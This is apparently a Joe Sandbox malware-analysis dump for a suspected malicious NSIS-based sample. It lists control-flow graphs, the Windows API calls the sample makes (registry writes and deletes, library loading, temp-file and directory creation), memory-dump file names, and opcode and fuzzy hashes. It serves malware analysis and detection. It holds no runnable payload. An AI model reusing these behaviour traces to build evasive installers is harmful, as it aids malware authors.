                                                                                                              control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 757 73f91777-73f917b6 call 73f91b5f 761 73f917bc-73f917c0 757->761 762 73f918d6-73f918d8 757->762 763 73f917c9-73f917d6 call 73f92394 761->763 764 73f917c2-73f917c8 call 73f92352 761->764 769 73f917d8-73f917dd 763->769 770 73f91806-73f9180d 763->770 764->763 773 73f917f8-73f917fb 769->773 774 73f917df-73f917e0 769->774 771 73f9182d-73f91831 770->771 772 73f9180f-73f9182b call 73f92569 call 73f915b4 call 73f91272 GlobalFree 770->772 775 73f9187e-73f91884 call 73f92569 771->775 776 73f91833-73f9187c call 73f915c6 call 73f92569 771->776 797 73f91885-73f91889 772->797 773->770 777 73f917fd-73f917fe call 73f92d37 773->777 779 73f917e8-73f917e9 call 73f92aac 774->779 780 73f917e2-73f917e3 774->780 775->797 776->797 791 73f91803 777->791 788 73f917ee 779->788 786 73f917f0-73f917f6 call 73f92724 780->786 787 73f917e5-73f917e6 780->787 796 73f91805 786->796 787->770 787->779 788->791 791->796 796->770 801 73f9188b-73f91899 call 73f9252c 797->801 802 73f918c6-73f918cd 797->802 807 73f9189b-73f9189e 801->807 808 73f918b1-73f918b8 801->808 802->762 804 73f918cf-73f918d0 GlobalFree 802->804 804->762 807->808 809 73f918a0-73f918a8 807->809 808->802 810 73f918ba-73f918c5 call 73f9153d 808->810 809->808 811 73f918aa-73f918ab FreeLibrary 809->811 810->802 811->808
                                                                                                              APIs
                                                                                                                • Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DB2
                                                                                                                • Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DB7
                                                                                                                • Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F91825
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 73F918AB
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73F918D0
                                                                                                                • Part of subcall function 73F92352: GlobalAlloc.KERNEL32(00000040,?), ref: 73F92383
                                                                                                                • Part of subcall function 73F92724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73F917F6,00000000), ref: 73F927F4
                                                                                                                • Part of subcall function 73F915C6: wsprintfW.USER32 ref: 73F915F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                              • Opcode ID: 63ceba952bed29c64fd1ecd6cc29df0f350816648b4c0ee6df8267b4c25c3f3b
                                                                                                              • Instruction ID: 489116b15aa464f7f22cc9163d1fec1fa43ef72965f0704ac661ebd2598259b6
                                                                                                              • Opcode Fuzzy Hash: 63ceba952bed29c64fd1ecd6cc29df0f350816648b4c0ee6df8267b4c25c3f3b
                                                                                                              • Instruction Fuzzy Hash: C34193B250070AEFFB119F649E84B9537ECBB043D0F1945B5E90BEA1D6DB788044DB68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 824 402427-402434 call 402c41 lstrlenW 822->824 825 402438-40243b 822->825 824->825 828 40243d-40244e call 402c1f 825->828 829 40244f-402452 825->829 828->829 830 402463-402477 RegSetValueExW 829->830 831 402454-40245e call 4031d6 829->831 835 402479 830->835 836 40247c-40255d RegCloseKey 830->836 831->830 835->836 836->821 839 40288b-402892 836->839 839->821
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseValuelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp
                                                                                                              • API String ID: 2655323295-2574335292
                                                                                                              • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                              • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 845 405f54 842->845 844 405f57-405f5a 843->844 845->844
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-1968954121
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
